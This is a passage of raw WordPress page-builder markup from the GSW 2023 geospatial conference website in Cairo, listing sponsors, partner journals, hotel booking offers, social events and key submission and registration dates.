data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column 